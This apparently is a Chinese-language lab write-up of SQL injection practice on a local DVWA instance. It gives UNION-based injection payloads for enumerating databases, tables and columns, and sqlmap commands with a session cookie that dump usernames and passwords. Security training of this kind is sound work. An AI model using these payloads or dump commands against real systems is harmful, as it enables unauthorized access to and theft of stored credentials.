记SQL注入漏洞操练

启动容器后，我们先查看
docker ps   # 查看正在运行的容器 
确定DVWA的容器id，进入docker容器路径，进入对应id的容器，再启动mysql
docker exec -it id /bin/bash 

运行dvwa后，打开SQL Injection，我们测试输入参数，能看到返回的结果，通过查看php可以看到
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
后端服务器查询sql数据库的代码；
审计代码后我们再进行字符型注入测试成功
SELECT first_name, last_name FROM users WHERE user_id ='1' and 1=1 ;#';
这段代码是利用' 将1这个参数能and 1=1来进行逻辑运算符判断，后面加入#将其余的都注释掉。
通过发现字符型注入成功，我们再进行列数判断的注入
1' order by  1,2 #
1' union select 1,2 #
通过1，2，3，……进行增量，返回查询失败时，我们就可以判断该表的列数显示位。

ORDER BY 语句
ORDER BY 语句用于根据指定的列对结果集进行排序。
ORDER BY 语句默认按照升序对记录进行排序。

SQL UNION 操作符
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。
请注意，UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 SELECT 语句中的列的顺序必须相同。

1' union select 1,database() #
可以查询到当前数据库
1' union select 1,version() #
可以查询到版本信息
1' union select 1,system_user() #
可以查询到系统用户名
1' union select 1,user() #
可以查询到数据库用户名
1' union select 1,current_user() #
可以查询到当前用户名
1' union select 1,session_user() #
可以查询到连接数据库的用户名
1' union select 1,@@datadir #
可以查询到数据存储路径
1' union select 1,@@basedir #
可以查询到数据库安装路径
1' union select 1,@@version_compile_os #
可以查询到安装版本信息

那现在我们就可以来爆数据了，MySQL 自带的信息数据库：
performance_schema 用于性能分析；
information_schema 用于存储数据库元数据(关于数据的数据)，例如数据库名、表名、列的数据类型、访问权限等。

1' union select 1,SCHEMA_NAME  from information_schema.SCHEMATA #
可以爆出系统现有的数据库，再优化下格式
1' union select 1,group_concat(SCHEMA_NAME) from information_schema.SCHEMATA #

group_concat()
1、功能：将产生的同一个分组中的值连接起来，返回一个字符串结果。
2、语法：group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator '分隔符'] )
说明：通过使用distinct可以排除重复值；如果希望对结果中的值进行排序，可以使用order by子句；separator是一个字符串值，缺省为一个逗号。

我们之前已经爆出数据库名，现在再爆数据库内的表
1' union select 1,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='dvwa' #

爆表后再爆表字段
1' union select 1,group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users' #

爆字段后就可以爆数据了
1' union select 1,group_concat(first_name) from users #

我们copy注入路径，启动sqlmap
sqlmap -u "http://192.168.80.128/vulnerabilities/sqli/?id=&Submit=Submit#" 
-u #注入点

sqlmap -u "http://192.168.80.128/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=is5s61h4atbfmjivb6vcn8ejh3; security=low" --batch
--cookie cookie注入
--batch 从不询问用户输入，使用所有默认配置。 
查询cookie的方法可以使用 javascript:alert(document.cookie) 或fidder 抓包查询

sqlmap -u "http://192.168.80.128/vulnerabilities/sqli/?id=&Submit=Submit#"  --cookie="PHPSESSID=is5s61h4atbfmjivb6vcn8ejh3; security=low" --batch --dbs
可以爆出目标数据库
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema

sqlmap -u "http://192.168.80.128/vulnerabilities/sqli/?id=&Submit=Submit#"  --cookie="PHPSESSID=is5s61h4atbfmjivb6vcn8ejh3; security=low" --batch -D dvwa --tables 
知道数据库后，可以爆出表
-D “” #指定数据库名
--tables  数据库表

sqlmap -u "http://192.168.80.128/vulnerabilities/sqli/?id=&Submit=Submit#"  --cookie="PHPSESSID=is5s61h4atbfmjivb6vcn8ejh3; security=low" --batch -D dvwa -T users  --columns
知道表后，再爆字段
–columns #列出字段
-T “” #指定表名

sqlmap -u "http://192.168.80.128/vulnerabilities/sqli/?id=&Submit=Submit#"  --cookie="PHPSESSID=is5s61h4atbfmjivb6vcn8ejh3; security=low" --batch -D dvwa -T users  -C user,password --dump --stop 5
知道字段后爆内容，并且进行解密
-C “” #指定字段
–dump  #列出指定数据库的表的字段的数据
--stop xxx 输出指定字段数量

sqlmap -u "http://192.168.80.128/vulnerabilities/sqli/?id=&Submit=Submit#"  --cookie="PHPSESSID=is5s61h4atbfmjivb6vcn8ejh3; security=low" --batch -D dvwa --count 
--count  爆出用户条目